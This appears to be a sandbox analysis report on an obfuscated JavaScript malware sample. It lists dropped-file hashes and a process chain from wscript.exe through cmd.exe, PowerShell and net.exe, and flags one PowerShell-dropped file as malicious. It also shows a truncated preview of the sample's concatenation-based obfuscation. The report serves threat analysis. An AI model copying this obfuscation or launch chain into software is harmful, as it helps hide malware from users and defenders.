SHA-512: | D4711A1960089B8DC3B27F08E4EE58711B51ACA7942821AC4B16FAC327B9524A246E08C0DB795929E4161DA0BC95630992803FCCDFEA60DEC8B7B3A881761926 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.271156858102792 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfbPtdPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGDV8Z |
MD5: | 1ADE9742E63B9783A8CF950C369F5BD1 |
SHA1: | 5AC68FE15C43C9933CA89C7475892AD76CD51C80 |
SHA-256: | 05770C099CB0D16F0AFE5CCD3B0E531D4ACAB29262C62126E3E0836E3084C432 |
SHA-512: | A10359A54E511CFA616F5DDEFDC76EA53E2A09DB5EB9A19C93A47476B497443D7C70E562D71A5663443FB23849555C8105ABDA1A4CD60CD3FD4A2EFCFADE0328 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.269712740466875 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJf21rPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVG+16Z |
MD5: | 0216A070DFFB5603E8EA63CD2A9BD0D2 |
SHA1: | D3022391FE16867C87E1CA34282BD2E05CF86CBF |
SHA-256: | DFA6B60E4F97572F7A2B78ED79B3B63AE8A9A3191E3867CB030A19C9890FF2A6 |
SHA-512: | 2A5F37A6FF06097802827175A3451B3E093E009F85637640FAE3EC4E456740CF5A11735AD5DCC3223344ACFF0BA4B41002A2B38D464EE2E585B622EFEBCFABEC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.664540493754479 |
Encrypted: | false |
SSDEEP: | 24:Yv6XBIDcO2JhoamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSX:YvEIDcpJhuBgkDMUJUAh8cvMX |
MD5: | E78A841E380A11DBD2F927577197A7DE |
SHA1: | 933C9571730EE1D8904B9E18BC8D52FDE41FD1C1 |
SHA-256: | D79AEE98919D2AE8DD8E6B081F53DA28CD787D82B4AC1E0CCC5DB92C7AB96B06 |
SHA-512: | FE5B95F1AE319B6A25670068911B20A663D0040E2EE606498F775B5A6EE825281F3F4C07A4136EC03C47FCF8C07656D6CA11FDD332E2DFFD40138457212E4CE5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.243744549558941 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJfshHHrPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGUUUU |
MD5: | E031F32A620C60762E9F9C26E7CCAF25 |
SHA1: | 733A40CF829BB00FAD2F9185DF11453EB3C8A74A |
SHA-256: | DE3D294EDD070EDE85A2CBBFCFF7A473E5268D48BA6F62E66CD7E38FA7904015 |
SHA-512: | 47B0ABEA20940058BA8ECD0B32C0E5AAD5C7D3969ED8FA620AE0066B2D323980025CD6331A10C3D404C39DE99CA5755936B90D0682D3B1A10F0BC436ACDE65AA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.259147686703098 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXB8BqBCDgUqBCYO2vB3/dVlPIHAR0YFVxjeoAvJTqgFCrPeUkwRe9:YvXKXBGqBCDgU6CV2vR/ZwHAZTVGTq1C |
MD5: | 392821C5F306DA27291DFE902D6D62FB |
SHA1: | 80A9726E2A3BC0CC884F53E0079DFA5BF5233E94 |
SHA-256: | 8A6071E44F6B0DCD729F19B06D3D09325876742CE85C290F8646BD5A82B699D5 |
SHA-512: | C468EDCE7D56BFBFF81DEDDC163F85361CC64073C2BAAF403AB40098F0E3EF76DB560A4F92F1FD6DAEEC82B58DC786730AE95D0FE8B4944A067EF0E6ED2B4668 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.145523059697734 |
Encrypted: | false |
SSDEEP: | 24:Yf/aGT0A3ayv2x+wIcXgy5Uc5FmjYj0S+cu2CE2LSQC+lGZrQ1d55h9vuHOG:YvAAkouQna2DEakZrQPTh9g |
MD5: | 95E8948A6CED1E2DEDCFFF33B204B6B4 |
SHA1: | 3F0CD04B6034701A6C68F0C3A2E19BD01416F579 |
SHA-256: | EB6E130A5F485960DB6D36FE10A976A3022C0C6C11E17F3174271EA6CAAA3FFE |
SHA-512: | 9DAEE95F43C479BD4EC0542ADDAC04C3DBA1914E20C7F63F7BE1FAD5138327847A20FC7BDCF78DA5AA0C901D850501BEB5160065B2D06B2FFA78773B27699D4D |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.319395835638779 |
Encrypted: | false |
SSDEEP: | 24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMeddtqVpn:TGufl2GL7ms9WR1CPmPbPah9ypilIb |
MD5: | 63B72EB734D806DD758797671F3F85E3 |
SHA1: | D968DCD17284F279E0607067D478C71D5C4B5AD4 |
SHA-256: | 69DE45BC5D3AA218350D1EE92C0ED9F60162B233DA45EB3729321C6BB39BEDA7 |
SHA-512: | AF97CE345B927D70FDD7E71ADBB64D5C6483804A1AC44908768130735681A8CE91C1DDEE7F4B50EEF10B91D6C1C492BA2461D099B73E26ECB85FF841DB903140 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.7826917671844995 |
Encrypted: | false |
SSDEEP: | 24:7+tylhn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMedd4qVpaVrScVr0InTqLhx/C:7M5WR1CPmPbPahIypilIeqFl2GL7msY |
MD5: | 3044910702A2AE9C00D54F311C935748 |
SHA1: | 5084A42D8361F310E0F4792C46509DCB034FC367 |
SHA-256: | CBEE139835E4B0C54758705750EA7000D323C3DE03A4E76D5123692A7D52F04D |
SHA-512: | D9EBA3A93E9F28B30DD1BCE8EF5251CFB7D77B89867BA339FC92CF944D0E5D7C86BC06EF18711766D307AD19DFC6076FB5222C6872D03E5EB9C92E1DA1A85228 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEgnV/xgQgeIPwUcMEQiuEnZjxzIgGEYyu:6a6TZ44ADEnV/xgd5PrO3jRGEK |
MD5: | BCB3A00CD24B62118B7CB30CEAE4D6E0 |
SHA1: | B88C4850C419936DC51337F5555288A2CD85E5B1 |
SHA-256: | F000F927CFDEC0167513DC497A0E31EB5E082C7EA6CCB7B16F3B4EC2864EA6D5 |
SHA-512: | 13112B020D9AEEBFC7BB33BBB92EA58E78CD8782CD7FC2BA4D67518587523A6DBF7496A537D0DF13D0ED96854EA48D51428B968B7B00FF07E7F59D385109BD19 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:Nlllul3nqth:NllUa |
MD5: | 851531B4FD612B0BC7891B3F401A478F |
SHA1: | 483F0D1E71FB0F6EFF159AA96CC82422CF605FB3 |
SHA-256: | 383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F |
SHA-512: | A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.5105370742203172 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Cl8fe:Qw946cPbiOxDlbYnuRKdi |
MD5: | 820769110F68EAA5E196C421E6E52143 |
SHA1: | 7825843D9D827F7E04570402E57A03A5448A1EFE |
SHA-256: | B8162F530B4A9FEAE1123A7529365993EF516DB3782F8B134C110AF7B6A4BDA9 |
SHA-512: | D9544A858F6D52DE8F6DD99614C10A735D5192FF6080054B9A9863FE09542B5AD407B92F61AC0A56EE5BD2B0FCE417B29BB3964DAAEE3057E24482B202DC8E8D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 01-59-51-160.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.33860678500249 |
Encrypted: | false |
SSDEEP: | 384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B |
MD5: | C3FEDB046D1699616E22C50131AAF109 |
SHA1: | C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D |
SHA-256: | EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD |
SHA-512: | 845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.34246112405931 |
Encrypted: | false |
SSDEEP: | 384:5sYtQMqO22xBkOXRsSRTJTajDo/mQEQIVi9gbgJgtgrgh08QhlPXxxaZYLoLCHSH:DdM |
MD5: | 0D7939F1D05455B05E4D6617CF9A8813 |
SHA1: | 3CC805FC3A4E13942063CD872BED099084AA9BFA |
SHA-256: | 16A770A88EE321CFE7C654AB331781921AF88FA6421C96BEA8BD97E5DD964C21 |
SHA-512: | 9589F6CD97ED6708A3485DD08373AEEFC3FFCBAB97B78E0D65E04BAF560BC2EA9034FBEB5D4B9627433AE09D06A5FE37F15F7F98437DA1AC7E853E2CCC842AE2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.404756296123006 |
Encrypted: | false |
SSDEEP: | 192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbQcbQIJ7cb1:ceo4+rsCpJs |
MD5: | FE3656F542CFC51581845F06AC60EE25 |
SHA1: | E0DB59BCDF73DA4A5828689D269FB4901D09C948 |
SHA-256: | AB413C3B604F2966E3054B606BE467E17DB12ABDCE8E87744E1ED81D3C9668C5 |
SHA-512: | 5F080986FEEA7393F5DD1F7C4922F52377DEE19E7C16DBDEA10530BDADBC63B67072DC9DE7AF6C7B721039645EB6D445F217BCB5F39A2A9AFE2B800704F2C5FB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ4ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ48 |
MD5: | 1D64D25345DD73F100517644279994E6 |
SHA1: | DE807F82098D469302955DCBE1A963CD6E887737 |
SHA-256: | 0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC |
SHA-512: | C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru |
MD5: | 18E3D04537AF72FDBEB3760B2D10C80E |
SHA1: | B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC |
SHA-256: | BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4 |
SHA-512: | 2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.905275723202681 |
TrID: | |
File name: | 894623912226711207.js |
File size: | 23'328 bytes |
MD5: | 1878300313f90b0508a40acae57dd300 |
SHA1: | 812fb9ce81e708a08ddce49e2a8876d1dba59541 |
SHA256: | 6a540640486340e1658d20ee47a9cfef7ea74ef32fd258861ec94b8b573df8c0 |
SHA512: | 87a73e200ed171334a8b876f226214c99fc503e793c5c254aa135936c03af9c5c81c1f722a75f72918e6c5c63f13386d339f96b059cf7e7619e48886ef0a9fda |
SSDEEP: | 384:p0L2Umjib2Wrt9rqdTdtYsVgHmFjBYc5oig1k2zhc1tDX5/tuMbqzoKBlTAa1pAk:uL2VjiSw9edTdtYsVgHmFjBYc5oig1kq |
TLSH: | 4FA2658968005A2A89CD50F9948555BCB0D953DFCBD0405DA2F74CA6BF4EBE382F31BE |
File Content Preview: | function sonbcwj(){sgcuq=[1031,3079,5127,4103,2055,3072];var zrbnnbrt=this[evasuca+tulwwa+mzdzjteqq+iazmt+fgbgd+ccyttn+rnntfpyds+gfmjwnz](this[grmbsv+znlctzg+adtfhpl+mzdzjteqq+ujubxe+evasuca+gfmjwnz][ampffhnnd+mzdzjteqq+fgbgd+tulwwa+gfmjwnz+fgbgd+iwrwgbwo |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 01:59:43 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff68e110000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 01:59:43 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff631310000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 01:59:43 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6ee680000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 01:59:43 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cb6b0000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 01:59:47 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e8200000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 01:59:47 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff631310000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 01:59:47 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7b7c20000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 01:59:48 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79c940000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
Start time: | 01:59:48 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff67e6d0000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 10 |
Start time: | 01:59:48 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff79c940000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function sonbcwj() { |
|
